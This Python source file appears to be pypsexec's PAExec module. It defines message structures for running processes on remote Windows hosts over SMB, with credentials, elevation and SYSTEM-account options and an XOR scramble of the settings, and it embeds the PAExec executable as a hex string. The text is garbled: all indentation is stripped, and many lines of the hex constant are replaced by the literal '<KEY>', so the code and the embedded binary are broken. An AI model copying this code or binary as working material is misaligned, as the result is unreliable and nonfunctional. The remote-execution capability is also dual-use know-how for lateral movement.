```python
import binascii
import os
import struct
from smbprotocol.structure import BoolField, BytesField, EnumField, \
IntField, ListField, Structure, StructureField, DateTimeField
from pypsexec.exceptions import PAExecException
try:
from collections import OrderedDict
except ImportError: # pragma: no cover
from ordereddict import OrderedDict
def paexec_out_stream(buffer_size=4096):
"""
Creates a generator to read the PAExec executable data as a bytes stream.
:param buffer_size: The size of the buffer yielded
:return: (bytes, offset) = the butes and the offset of the bytes string
"""
payload_bytes = binascii.unhexlify(PAEXEC_DATA)
byte_count = len(payload_bytes)
for i in range(0, byte_count, buffer_size):
yield payload_bytes[i:i + buffer_size], i
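# e.g. stream the embedded binary to a remote file in buffer_size chunks
# (remote_file here is a hypothetical writer taking data and an offset):
#     for chunk, offset in paexec_out_stream():
#         remote_file.write(chunk, offset)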
def get_unique_id(pid, computer_name):
"""
https://github.com/poweradminllc/PAExec/blob/master/Remote.cpp#L1045-L1065
DWORD RemMsg::GetUniqueID()
Creates a unique ID based on the PID of the local host and the name of the
local host. It is derived from the first 4 bytes of a UTF-16 Little Endian
encoded computer name and the local PID xor'd together.
This value is sent in the PAExecSettingsMsg to define the process details
and also the PAExecResponseMsg to control the execution and results of
the processed based on the settings.
:param pid: (int) the process id of the current host
:param computer_name: (str/unicode) of the current hostname
:return: int of the unique ID derived from the PID and Computer Name
"""
bcomp_name = computer_name.encode('utf-16-le')[:4]
bcomp_name = bcomp_name + (b"\x00" * (4 - len(bcomp_name)))
return pid ^ struct.unpack("<L", bcomp_name)[0]
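# Worked example with illustrative values: "MYPC".encode('utf-16-le')[:4] is
# b'M\x00Y\x00', which unpacks little-endian to 0x0059004D, so
# get_unique_id(1234, "MYPC") == 1234 ^ 0x0059004D == 0x0059049F.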
class PAExecMsgId(object):
"""
https://github.com/poweradminllc/PAExec/blob/master/stdafx.h#L52-L57
The various ID's used by PAExec when sending messages to and from the
remote service.
"""
MSGID_SETTINGS = 1
MSGID_RESP_SEND_FILES = 2
MSGID_SENT_FILES = 3
MSGID_OK = 4
MSGID_START_APP = 5
MSGID_FAILED = 6
class ProcessPriority(object):
"""
https://msdn.microsoft.com/en-us/library/windows/desktop/ms683211(v=vs.85).aspx
Set's the priority of the thread in the current process
"""
ABOVE_NORMAL_PRIORITY_CLASS = 0x00008000
BELOW_NORMAL_PRIORITY_CLASS = 0x00004000
HIGH_PRIORITY_CLASS = 0x00000080
IDLE_PRIORITY_CLASS = 0x00000040
NORMAL_PRIORITY_CLASS = 0x00000020
REALTIME_PRIORITY_CLASS = 0x00000100
class PAExecMsg(Structure):
"""
    Generic message from PAExec; the first 2 bytes denote the Msg ID that
    tells the host the type of message it is, and the buffer contents vary
    based on the type of message being sent or received.
    This is slightly different to the PAExecSettingsMsg, as the data in the
    settings msg is xor'd to slightly obfuscate it. The buffer structures
    currently defined are PAExecStartBuffer and PAExecReturnBuffer.
"""
def __init__(self):
self.fields = OrderedDict([
('msg_id', EnumField(
size=2,
enum_type=PAExecMsgId
)),
('unique_id', IntField(size=4)),
('buffer_length', IntField(
size=4,
default=lambda s: len(s['buffer'])
)),
('buffer', BytesField(
size=lambda s: s['buffer_length'].get_value()
))
])
super(PAExecMsg, self).__init__()
def check_resp(self):
msg_id = self['msg_id'].get_value()
if msg_id != PAExecMsgId.MSGID_OK:
raise PAExecException(msg_id, self['buffer'].get_value())
class PAExecSettingsMsg(Structure):
"""
Custom PAExecMsg structure that contains the settings used by PAExec to
configure the remote process. The structure is different from the standard
PAExecMsg as the values past the msg_id is xor'd and the initial XOR value
is generated randomly and stored after the msg_id.
This does not encrypt the data but rather scrambles it so that someone
snooping on the network traffic isn't easily able to see the settings as it
can contain the credentials of a user. SMB encryption should really be used
in most cases if it is available as that actually encrypts the data.
The buffer value contains the PAExecSettingsBuffer type that contains all
the settings used by PAExec.
"""
def __init__(self):
self.fields = OrderedDict([
('msg_id', EnumField(
size=2,
default=PAExecMsgId.MSGID_SETTINGS,
enum_type=PAExecMsgId
)),
('xor_val', IntField(
size=4,
default=os.urandom(4)
)),
('unique_id', IntField(size=4)),
('buffer_len', IntField(size=4)),
('buffer', StructureField(
structure_type=PAExecSettingsBuffer
))
])
super(PAExecSettingsMsg, self).__init__()
def pack(self):
# need to xor the buffer as expected by PAExec
xor_value = self['xor_val'].get_value()
# the id, length and buffer itself is xor'd
input_data = self['unique_id'].pack() + self['buffer_len'].pack() + \
self['buffer'].pack()
buffer = self._xor_data(xor_value, input_data)
# build the final data structure
data = self['msg_id'].pack()
data += self['xor_val'].pack()
data += buffer
return data
def unpack(self, data):
# need to de-xor the buffer to get human readable values
xor_value = struct.unpack("<L", data[2:6])[0]
buffer = data[6:]
buffer_data = self._xor_data(xor_value, buffer)
unique_id = buffer_data[:4]
buffer_len = buffer_data[4:8]
structure_a = PAExecSettingsBuffer()
structure_a.unpack(buffer_data[8:])
self['msg_id'] = data[:2]
self['xor_val'] = data[2:6]
self['unique_id'] = unique_id
self['buffer_len'] = buffer_len
self['buffer'] = structure_a
return b""
def _xor_data(self, xor_value, data):
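        # Rolling XOR with feedback: XOR the 4-byte window with the key
        # (key += 3 per step), emit the low byte of the result, then form
        # the next window from the remaining 3 XORed bytes plus the next
        # input byte; the final window is emitted whole. Both pack() and
        # unpack() route through this transform.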
buffer = b""
next_bytes = data[:4]
for i in range(0, len(data) - 4):
int_value = struct.unpack("<L", next_bytes)[0]
xored_value = int_value ^ xor_value
new_bytes = struct.pack("<L", xored_value)
buffer += new_bytes[:1]
next_bytes = new_bytes[1:] + data[i + 4:i + 5]
xor_value += 3
int_value = struct.unpack("<L", next_bytes)[0]
xored_value = int_value ^ xor_value
new_bytes = struct.pack("<L", xored_value)
buffer += new_bytes
return buffer
class PAExecSettingsBuffer(Structure):
"""
https://github.com/poweradminllc/PAExec/blob/master/stdafx.h#L132-L341
A PAExec buffer that contains the settings used by the remote PAExec
service to start a process. It contains a wide range of settings that can
be configured such as the remote user as well as the executable and
arguments used to start the process.
All BytesFields in this structure are utf-16-le encoded strings and should
be encoded before setting in the structure.
"""
def __init__(self):
self.fields = OrderedDict([
('version', IntField(
size=4,
default=1
)),
('num_processors', IntField(
size=4,
default=lambda s: len(s['processors'].get_value())
)),
('processors', ListField(
size=lambda s: s['num_processors'].get_value() * 4,
list_count=lambda s: s['num_processors'].get_value(),
list_type=IntField(size=4)
)),
('copy_files', BoolField(size=1)),
('force_copy', BoolField(size=1)),
('copy_if_newer_or_higher_ver', BoolField(size=1)),
('asynchronous', BoolField(size=1)),
('dont_load_profile', BoolField(size=1)),
('interactive_session', IntField(size=4)),
('interactive', BoolField(size=1)),
('run_elevated', BoolField(size=1)),
('run_limited', BoolField(size=1)),
('password_len', IntField(
size=4,
default=lambda s: int(len(s['password']) / 2)
)),
('password', BytesField(
size=lambda s: s['password_len'].get_value() * 2
)),
('username_len', IntField(
size=4,
default=lambda s: int(len(s['username']) / 2)
)),
('username', BytesField(
size=lambda s: s['username_len'].get_value() * 2
)),
('use_system_account', BoolField(size=1)),
('working_dir_len', IntField(
size=4,
default=lambda s: int(len(s['working_dir']) / 2)
)),
('working_dir', BytesField(
size=lambda s: s['working_dir_len'].get_value() * 2
)),
('show_ui_on_win_logon', BoolField(size=1)),
('priority', EnumField(
size=4,
default=ProcessPriority.NORMAL_PRIORITY_CLASS,
enum_type=ProcessPriority
)),
('executable_len', IntField(
size=4,
default=lambda s: int(len(s['executable']) / 2)
)),
('executable', BytesField(
size=lambda s: s['executable_len'].get_value() * 2
)),
('arguments_len', IntField(
size=4,
default=lambda s: int(len(s['arguments']) / 2)
)),
('arguments', BytesField(
size=lambda s: s['arguments_len'].get_value() * 2
)),
('disable_file_redirection', BoolField(size=1)),
('enable_debug', BoolField(size=1)),
('remote_log_path_len', IntField(
size=4,
default=lambda s: int(len(s['remote_log_path']) / 2)
)),
('remote_log_path', BytesField(
size=lambda s: s['remote_log_path_len'].get_value() * 2
)),
('no_delete', BoolField(size=1)),
('src_dir_len', IntField(
size=4,
default=lambda s: int(len(s['src_dir']) / 2)
)),
('src_dir', BytesField(
size=lambda s: s['src_dir_len'].get_value() * 2
)),
('dest_dir_len', IntField(
size=4,
default=lambda s: int(len(s['dest_dir']) / 2)
)),
('dest_dir', BytesField(
size=lambda s: s['dest_dir_len'].get_value() * 2
)),
('num_src_files', IntField(
size=4,
default=lambda s: len(s['src_files'].get_value())
)),
('src_files', ListField(
list_count=lambda s: s['num_src_files'].get_value(),
list_type=StructureField(structure_type=PAExecFileInfo),
unpack_func=lambda s, d:
self._unpack_file_list(s, d, 'num_src_files')
)),
('num_dest_files', IntField(
size=4,
default=lambda s: len(s['dest_files'].get_value())
)),
('dest_files', ListField(
list_count=lambda s: s['num_dest_files'].get_value(),
list_type=StructureField(structure_type=PAExecFileInfo),
unpack_func=lambda s, d:
self._unpack_file_list(s, d, 'num_dest_files')
)),
('timeout_seconds', IntField(size=4))
])
super(PAExecSettingsBuffer, self).__init__()
def _unpack_file_list(self, structure, data, len_field):
files = []
remaining_data = data
for i in range(0, structure[len_field].get_value()):
file_structure, remaining_data = self._get_file(remaining_data)
files.append(file_structure)
return files
def _get_file(self, data):
min_size = 21
filename_size = struct.unpack("<L", data[:4])[0]
structure_end_offset = min_size + (filename_size * 2)
file_structure_data = data[:structure_end_offset]
file_structure = PAExecFileInfo()
file_structure.unpack(file_structure_data)
return file_structure, data[structure_end_offset:]
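# Field usage note: all string fields in this buffer expect UTF-16-LE bytes,
# consistent with the item assignment used elsewhere in this file, e.g.
#     settings = PAExecSettingsBuffer()
#     settings['username'] = "DOMAIN\\user".encode('utf-16-le')
#     settings['executable'] = "cmd.exe".encode('utf-16-le')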
class PAExecFileInfo(Structure):
"""
https://github.com/poweradminllc/PAExec/blob/master/stdafx.h#L59-L82
class FileInfo
Structure the contains information about a file to copy or move and is set
in PAExecSettingsBuffer. Like other PAExec messages, fields that take in a
string take in a utf-16-le encoded string as a bytes structure.
"""
def __init__(self):
self.fields = OrderedDict([
('filename_len', IntField(
size=4,
default=lambda s: int(len(s['filename']) / 2)
)),
('filename', BytesField(
size=lambda s: s['filename_len'].get_value() * 2
)),
('file_last_write', DateTimeField(size=8)),
('file_version_ls', IntField(size=4)),
('file_version_ms', IntField(size=4)),
('copy_file', BoolField(size=1))
])
super(PAExecFileInfo, self).__init__()
class PAExecStartBuffer(Structure):
"""
    Not explicitly defined in the PAExec source, but this is the buffer used in
    the PAExecMsg to start a remote process. On receipt of this message, the
    remote service will look up the settings matching the unique_id passed in
    and start the process with those settings.
The comp_name is a utf-16-le encoded string of the local hostname and
should match the host used in the service name.
"""
def __init__(self):
self.fields = OrderedDict([
('process_id', IntField(size=4)),
('comp_name_length', IntField(
size=4,
default=lambda s: int(len(s['comp_name']) / 2)
)),
('comp_name', BytesField(
size=lambda s: s['comp_name_length'].get_value() * 2
))
])
super(PAExecStartBuffer, self).__init__()
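# A minimal sketch, illustrative only: the start message carries the process
# id and the local hostname, encoded utf-16-le like the other string fields;
# comp_name_length fills itself in from its default on pack().
def _example_start_payload(pid, hostname):
    start = PAExecStartBuffer()
    start['process_id'] = pid
    start['comp_name'] = hostname.encode('utf-16-le')
    return start.pack()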
class PAExecReturnBuffer(Structure):
"""
The buffer used in the PAExecMsg that is sent by the remote service on
completion of the remote process. It contains a single Int32 value that is
the return code of the process.
"""
def __init__(self):
self.fields = OrderedDict([
('return_code', IntField(size=4))
])
super(PAExecReturnBuffer, self).__init__()
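# A minimal sketch, illustrative only: parse the return code out of the buffer
# the remote service sends back once the remote process has finished.
def _example_return_code(data):
    buff = PAExecReturnBuffer()
    buff.unpack(data)
    return buff['return_code'].get_value()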
# https://www.poweradmin.com/paexec/paexec.exe
# Hex string of the paexec executable as of v1.26; this is used when copying
# the executable from the current host to the remote Windows host
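# To recover the raw executable bytes from this constant (a sketch; assumes an
# intact hex payload): bytes.fromhex(PAEXEC_DATA)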
PAEXEC_DATA = '4d5a90000300000004000000ffff0000b8000000000000004000000000000' \
'00000000000000000000000000000000000000000000000000000000000e8' \
'0000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d206' \
'3616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400' \
'000000000000bc6f8748f80ee91bf80ee91bf80ee91b09c8241bf60ee91b0' \
'9c8271b8a0ee91b09c8261bd60ee91bf1767a1beb0ee91bf80ee81b400ee9' \
'1b9ee03a1bf20ee91b9ee0201bf90ee91bf80e7e1bf90ee91b9ee0251bf90' \
'ee91b52696368f80ee91b0000000000000000504500004c010500a9dded54' \
'0000000000000000e00002010b010b00008c0100005c010000000000bce90' \
'0000010000000a00100000040000010000000020000050001000000000005' \
'00010000000000002003000004000088eb020003004081000010000010000' \
'0000010000010000000000000100000000000000000000000e4410200b400' \
'000000a00200c0240000000000000000000000cc0200b816000000d002007' \
'41d000010a301003800000000000000000000000000000000000000000000' \
'0000000000a825020040000000000000000000000000a00100a0020000000' \
'0000000000000000000000000000000000000000000002e74657874000000' \
'9d8a010000100000008c01000004000000000000000000000000000020000' \
'0602e7264617461000004b2000000a0010000b40000009001000000000000' \
'00000000000000400000402e6461746100000080310000006002000012000' \
'000440200000000000000000000000000400000c02e72737263000000c024' \
'000000a002000026000000560200000000000000000000000000400000402' \
'e72656c6f630000564f000000d0020000500000007c020000000000000000' \
'0000000000400000420000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'000000000000000000000000000000000006a04b8238b4100e80ae300008b' \
'f18975f08d4e046800604200c706a8f84100e80d0f000033db895dfc895e0' \
'8895e0ce852080000894608885e108bc6e8b2e20000c20800558bec568bf1' \
'e826000000f6450801740756e8f9af0000598bc65e5dc20400568bf1e8560' \
'50000ff36e8e2af0000595ec356578bf98d77088bcec707a8f84100e83805' \
'00008bcee831050000ff36e8bdaf0000598b4f045f83e9105ee9b50e00006' \
'<KEY>' \
'04e8820400008d46088bc88945ece8ea04000068006042008d4ddce84d0e0' \
'<KEY>' \
'000068b8f8410053e8a5af00008bf0595985f60f840603000083c6028bce3' \
'3db8d5102668b0183c102663bc375f52bcad1f90f84e702000068acf84100' \
'<KEY>' \
'0000050895d08e870b000005985c074198bfb83c7020fb70750e85db00000' \
'<KEY>' \
'<KEY>' \
'8d4de8e822040000c645fc048b75e8837ef400745e8b45e080781000750b8' \
'd4de8e88e0300008b75e88d4ef0e8780c000083c0108945cc8d4ff0c645fc' \
'05e8660c00008d5810895dd08b4dec8d45cc508d45bc50c645fc06e87f030' \
'0008d4bf0e83d0d00008b4dcc8d49f0e8320d00008b5dd883c302e9df0000' \
'008bc32bc66800604200d1f850568d4de4e89a0300008b45e0c645fc07807' \
'8100075088d4de4e80f030000beb4f8410083c3025653e847ae000059593b' \
'c3750c83c3025653e837ae0000eb0a6a20585053e861af000059894508598' \
'<KEY>' \
'e8310300008d4ef0c645fc0be8a40b000083c0108945c4c645fc0c8b45d48' \
'3c0f08bc88945d8e88a0b00008d5810895dc88b4dec8d45c4508d45b450c6' \
'45fc0de8a30200008d4bf0e8610c00008b4dc48d49f0e8560c00008b4dd8e' \
'84e0c00008b45088d580233c08d4ef08845fce83b0c00008bcb33f68d5102' \
'668b0183c102663bc675f52bcad1f90f85c8fdffffe9e0000000538d4d08e' \
'8b7010000c645fc088b75e4837ef400744a8d4ef0e8030b000083c0108945' \
'c4c645fc098b4d088d49f0e8ee0a00008d5810895dc88b4dec8d45c4508d4' \
'<KEY>' \
'8b45088d48f0e8af0b00008d4ef0eb6b568d4d08e8470100008b45e0c645f' \
'c018078100075088d4d08e89e0100008b4d088d49f0e8880a00008d581089' \
'<KEY>' \
'0c645fc03e88f0100008d4ef0e84d0b00008d4bf0e8450b00008b45088d48' \
'f0e83a0b00008d4ff0e8320b000032c0e8c4de0000c20400568bf18b4e048' \
'3e910e81a0b00008b0e83e9105ee90f0b00006a04b8d18b4100e8bfde0000' \
'8bd9ff750c8d4d0ce89c0000008365fc00807b100075088d4d0ce8f600000' \
'<KEY>' \
'8b36807e0d0074e23b7b087414ff77108d4d0ce85202000085c07805897df' \
'<KEY>' \
'c6e81cde0000c20800558bec56ff75088d4508508bf1e85fffffff8b45083' \
'b46085e750433c0eb038b40145dc204006a04b8f3924100e80ade00008bf1' \
'8975f06800604200e8160a00008b45088365fc0085c07414a90000ffff750' \
'd0fb7c0508bcee84b010000eb08508bcee80a0000008bc6e8aadd0000c204' \
'00558bec568bf18b4d08e88602000050ff75088bcee8670800008bc65e5dc' \
'2040056578bf98b078b70f456e8ee0700008d56015250e873af0000595956' \
'<KEY>' \
'<KEY>' \
'06ff7004e8780000008b068940048b0689008b06894008836604005ec3558' \
'<KEY>' \
'eb378b016a0256ff1085c0743183c010568bcf8907e8850700008d043650f' \
'f750850ff37e86cac000083c4108bc75f5e5dc20c006805400080e8d90800' \
'<KEY>' \
'be8e3ffffff8b3f8d4e10e8c5fdffff56e8e1a90000807f0d00598bf774dd' \
'5f5e5b5dc20400558bec51535657894dfc6a00b9cc704200e884a7000033d' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'c8015dc204006805400080e8d6070000cc558bec8b450c53c1e80456400fb' \
'<KEY>' \
'00008bf05985f6745f570fb73e578bcbe8e40500000fb70e83c6028945088' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'0e8b42043b1075048930eb0389700889168972045e5dc20400558bec8b550' \
'8568b328b460889028b460880780d0075038950048b42048946048b013b50' \
'047505897004eb0f8b42043b50087505897008eb0289308956088972045e5' \
'dc204006a18e85ead00005985c00f84d4a600008d4804890085c974028901' \
'8d480885c97402890166c7400c0101c36a10b8f28a4100e8c2da0000894de' \
'433db895dfc8b39b0018b77048845ec807e0d00753a8bfe84db74148b4510' \
'8d4e10ff30e816feffff85c00f99c0eb10ff76108b4d10e804feffff85c00' \
'f98c08845ec84c074048b36ebc58b7608ebc08bf78975e884c074398b4de4' \
'8b013b387525ff75148d4510ff7510576a0150e8990000008b088b4508890' \
'8c6400401e8b0d90000c210008d4de8e83a0000008b75e88b45108d4e10ff' \
'30e8a0fdffff85c07912ff75148b4de4ff75108d45e857ff75ecebb98b450' \
'88930885804ebc033db5353e811d90000cc8b11807a0d0074058b4208eb15' \
'<KEY>' \
'b89118b5204807a0d0074ef8b0180780d00750289118bc1c3558bec535657' \
'<KEY>' \
'08943048b0f3bc1750e8959048b0789188b07895808eb1f807d0c00740c89' \
'188b0f3b0175118919eb0d8958088b0f3b410875038959088b43048bf3e99' \
'30000008b46048b50048b0a3bc175388b4a0880790c0074353b7008750a8b' \
'<KEY>' \
'4ff7004e8cdfdffffeb4c80790c00751ac6400c01c6410c018b46048b4004' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'0f84100e8aea40000cc6a10b8d78a4100e885d80000e8630000008bf833c9' \
'<KEY>' \
'b0b83e910e83603000083c0108906c645fc028b4b0483e910e82203000083' \
'c0108946048bc7e8a7d70000c20400ff75ece8fda400005933c95151e837d' \
'70000cc566a188bf1e87faa00008bd05985d2741e8b068d4a04890285c974' \
'048b0689018d4a0885c974048b0689018bc25ec3e8d4a30000ccc3558bec8' \
'<KEY>' \
'000780eb0e680e000780eb075dc36805400080e847030000cc558bec53578' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'd28b06578d48f08b39395104742739510c7d113950f87c208950f48b0633c' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'fc017e0a568bcfe843ffffffeb2d8b49f83bce7d2681f9000000407e0881c' \
'100001000eb098bc1992bc2d1f803c83bce0f4cce518bcfe878ffffff5f5e' \
'<KEY>' \
'bc87d08528bcee884ffffff8b065e5dc204006857000780e879010000cc55' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'3c4108bcf53e85cffffff5f5bc9c208006857000780e8c4000000cc680e00' \
'0780e8b9000000cc568bf1578b0e8b01ff50108d560c8bc8833a007c0f3b0' \
'e750b33c08bfe40f00fc102eb318b016a02ff7604ff108bf885ff74278b46' \
'048947048b46048d0c4502000000518d461050518d471050e8e4a3000083c' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'0983e910e941000000558bec8b450889450868603142008d450850e868d30' \
'<KEY>' \
'<KEY>' \
'88b0e568b01ff50045ec36a30b8578c4100e894d300008bfa8bd933c04050' \
'8945ec8d45c450ff1558a041006a006a006a018d45c450ff155ca04100836' \
'5dc008365e0008d45c468006042008d4df0c745d80c0000008945dcc745e0' \
'01000000e861ffffffff75088365fc00578d45e868c4f8410050e8378f000' \
'083c410508d4df0c645fc01e8cbfeffffc645fc008b4de88d49f0e855ffff' \
'ff8b35bca041008d45d8506aff33c0505068ff000000506a02ff75f0ffd68' \
'98390000000ff15c0a041008b8b900000008945e883f9ff740485c97531ff' \
'75f08d45e468f8f8410050e8cc8e000083c40cc645fc028b55e88b08e88f9' \
'00000c645fc008b4de48d49f0e8e9feffffff75088d45e457683cf9410050' \
'e89a8e000083c410508d4df0c645fc03e82efeffffc645fc008b4de48d49f' \
'0e8b8feffff8d45d8506aff33c0505068ff000000506a02ff75f0ffd68983' \
'98000000ff15c0a041008b8b980000008bf083f9ff740485c97530ff75f08' \
'd45e468f8f8410050e8368e000083c40cc645fc048b088bd6e8fa8f0000c6' \
'45fc008b4de48d49f0e854feffffff75088d45e457686cf9410050e8058e0' \
'00083c410508d4df0c645fc05e899fdffffc645fc008b4de48d49f0e823fe' \
'ffff8b75f08d45d8506aff33c0505068ff000000506a0156ff15bca041008' \
'98394000000ff15c0a041008b8b940000008bf883f9ff740485c9752e568d' \
'45e468f8f8410050e89e8d000083c40cc645fc068b088bd7e8628f0000c64' \
'5fc008b4de48d49f0e8bcfdffff8b839000000083f8ff744f85c0744b8b8b' \
'9800000083f9ff744085c9743c8b8b9400000083f9ff743185c9742d8b3dc' \
'8a041006a0050ffd76a00ffb398000000ffd76a00ffb394000000ffd732d2' \
'b9e0f94100e86e8f0000eb3d8b3dc4a0410050ffd7ffb398000000ffd7ffb' \
'394000000ffd733c0b201b998f94100898390000000898398000000898394' \
'000000e8338f0000c645ec008d4ef0e81dfdffff8a45ece8aed00000c3558' \
'bec81ec50010000a16063420033c58945fc53568b75086af5ff15cca04100' \
'33db68ff0000008985d0feffff8d85fdfeffff5350889dfcfeffffe87ac70' \
'00083c40c899ddcfeffff53536a0153ff15d0a04100803d32804200008bd8' \
'899dd8feffff0f857f0100005783a5b0feffff0033c08dbdb4feffffababa' \
'bab8d85b0feffff508d85dcfeffff5068ff0000008d85fcfeffff508b0689' \
'9dc0feffffffb090000000ff15d4a0410085c0740983bddcfeffff007511f' \
'f15c0a041003de80000000f841e010000803d32804200000f85110100008b' \
'46106aff8985c8feffff6a008d85c8feffff506a02899dccfeffffff15d8a' \
'0410085c00f84e700000080bdfcfeffff0c0f84fe0000008b85dcfeffff3d' \
'000100000f8360010000803d3280420000c68405fcfeffff000f85b400000' \
'08d461850ff15e8a041008b463032ffeb3e8378141072048b08eb028bc88d' \
'95fcfeffff8a1a3a19751a84db74128a5a013a5901750e83c20283c10284d' \
'b75e433c9eb051bc983c90185c9740a83c01839463475bdeb12508d85c4fe' \
'ffff508d4e30b701e8840800008d461850ff15eca0410084ff752b8d85fcf' \
'effff506820fa4100e8f6a5000083c02050e841a40000e8e8a5000083c020' \
'50e86ea7000083c4108b9dd8feffff803d32804200000f8483feffff5f53f' \
'f15c4a041008d461450ff15f0a041008b4dfc5e33cd33c05be80c9c0000c9' \
'c2040083a5d4feffff0033c0668985e4feffff8985e0feffff8dbde6fefff' \
'fababababab8bbdd0feffff8d85e4feffff5057ff15dca0410085c074960f' \
'bf8de6feffff8d85d4feffff500fbf85e4feffffffb5e0feffff0fafc8516' \
'a2057ff15e0a04100ffb5e0feffff57ff15e4a04100e95cffffffe8a7a200' \
'00cc558bec81ec24010000a16063420033c58945fc53568b750833c050506' \
'a0150ff15d0a04100803d32804200008bd80f85e30000005783a5dcfeffff' \
'0033c08dbde0feffffabababab8d85dcfeffff508d85f8feffff506800010' \
'0008d85fcfeffff508b06899decfeffffffb098000000ff15d4a0410085c0' \
'740983bdf8feffff007511ff15c0a041003de80000000f8482000000803d3' \
'28042000075798b46108985f0feffff8b85ecfeffff6aff8985f4feffff6a' \
'008d85f0feffff506a02ff15d8a0410085c0744d8b85f8feffff3d0001000' \
'07364c68405fcfeffff008d85fcfeffff506820fa4100e83da4000083c040' \
'50e888a20000e82fa4000083c04050e8b5a5000083c410803d32804200000' \
'f841fffffff5f53ff15c4a041008d461450ff15f0a041008b4dfc5e33cd33' \
'c05be8599a0000c9c20400e867a10000cc558bec83e4f86aff687d8c41006' \
'4a1000000005081ec58010000a16063420033c489842450010000535657a1' \
'6063420033c4508d84246801000064a3000000008b75086af6ff15cca0410' \
'068ff0000008bd88d4424616a0050c644246800e893c3000083c40c33c951' \
'33c051405051894c2424894c2434ff15d0a0410083642420008944241c8d4' \
'424205053ff15f4a041006a0053ff15f8a0410033c94133d20fb6c983f8ff' \
'0f45ca894c24183815328042000f855d01000084c97426eb1b6a00ff7610f' \
'f15fca0410085c00f84440100006a64ff1500a14100e882a6000085c074dc' \
'83642414006a008d4424185068000100008d4424685053ff15d4a0410085c' \
'07511ff15c0a041003de80000000f8401010000803d32804200000f85f400' \
'0000807c24180074598d7e1857ff15e8a041008b4424143d000100000f83c' \
'9000000c644045c008d44245c508d4c2448e84d0b000083a4247001000000' \
'8d442444508d4e30e86a040000838c2470010000ff8d4c2444e8190700005' \
'7ff15eca04100836424300033c08d7c2434abababab8b44241c894424408d' \
'442430508d44242850ff74241c8d442468508b06ffb094000000ff1504a14' \
'10085c07452803d3280420000754f8b4610894424288b4424406aff894424' \
'306a008d442430506a02ff15d8a0410085c0742b8b06ffb094000000ff150' \
'8a14100803d328042000075148b4c2418e9aefeffffe8569f0000ff15c0a0' \
'4100ff74241cff15c4a04100ff74242053ff150ca141008d461450ff15f0a' \
'0410033c08b8c246801000064890d00000000595f5e5b8b8c245001000033' \
'cce8f89700008be55dc204006a3cb8048c4100e8a3ca00008bd9895df033c' \
'040508945e48d45b850c745ec0a000000ff1558a0410033ff575733f64656' \
'8d45b850ff155ca04100ff730c8d45b8ff7308897dd0ff73048945d08d45e' \
'06824fa4100897dd450c745cc0c0000008975d4e84e860000897dfcff730c' \
'8d45dcff7308ff73046854fa410050e834860000c645fc01ff730c8d45d8f' \
'f7308ff73046884fa410050e81986000083c43cc645fc028b75e08b7ddc8b' \
'5dd8e9290100008b4dec8bc149894dec85c00f84250100008b45f08b008b8' \
'09000000083f8ff740485c075396a0056ff1510a1410085c0742c6a006880' \
'0000006a038d45cc506a00680000008056ff1514a141008b55f08b0a89819' \
'0000000ff15c0a041008b45f08b008b809800000083f8ff740485c075336a' \
'0057ff1510a1410085c074266a0068800000006a038d45cc506a006800000' \
'08057ff1514a141008b55f08b0a8981980000008b45f08b008b8094000000' \
'83f8ff740485c075336a0053ff1510a1410085c074266a0068800000006a0' \
'38d45cc506a00680000004053ff1514a141008b55f08b0a8981940000008b' \
'45f08b008b889800000083f9ff742285c9741e8b889400000083f9ff74138' \
'5c9740f8b809000000083f8ff740485c0751868e8030000ff1500a1410080' \
'3d32804200000f84cafeffff8b45f08b088b919800000083faff0f84e2000' \
'00085d20f84da0000008b919400000083faff0f84cb00000085d20f84c300' \
'00008b899000000083f9ff0f84b400000085c90f84ac0000006a00ff7010f' \
'f15fca0410085c00f8496000000803d32804200000f85000100008b45f083' \
'c01450ff1518a141008d45e85033c050ff75f068462240005050e858aa000' \
'083c41850ff15c4a041008b45f083c01450ff1518a141008d45e85033c050' \
'ff75f068ca2440005050e82baa000083c41850ff15c4a041008b45f083c01' \
'450ff1518a141008d45e85033c050ff75f0680a2640005050e8fea9000083' \
'c41850ff15c4a04100eb7b8b45f0803d3280420000756b6a00ff7010ff15f' \
'ca0410085c0745c8b45f08b00ffb098000000ff15c4a041008b55f08b02ff' \
'b094000000ff15c4a041008b4df08b01ffb090000000ff15c4a041008b4df' \
'033d28b018990980000008b018990940000008b01b9b4fa41008990900000' \
'00b201e8ab8500008365e4008d4bf0e895f3ffff8d4ff0e88df3ffff8d4ef' \
'0e885f3ffff8b45e4e816c70000c3558bec568bf1578b4e048b7d083bf973' \
'44393e77402b3e538bc76a18995bf7fb8bf83b4e087508518bcee8d700000' \
'08b4e046bff18033e85c9741483611000c741140f00000057c60100e82302' \
'0000015e045beb2c3b4e087508518bcee8a40000008b4e0485c9741483611' \
'000c741140f00000057c60100e8f5010000834604185f5e5dc20400558bec' \
'<KEY>' \
'208ff36e8c59300005983661000c746140f000000578bcec60600e8aa0100' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'558bec568b750857837e14108bf973138b4610407418505657e882a000008' \
'<KEY>' \
'00c746140f0000005fc606005e5dc20400568bf1837e14107208ff36e8a69' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'141089411072048b11eb028bd1c60402008bc15dc204006800fb4100e8a19' \
'<KEY>' \
'15837e1410894e1072048b06eb028bc6c6040800eb3e85d2743a837e14107' \
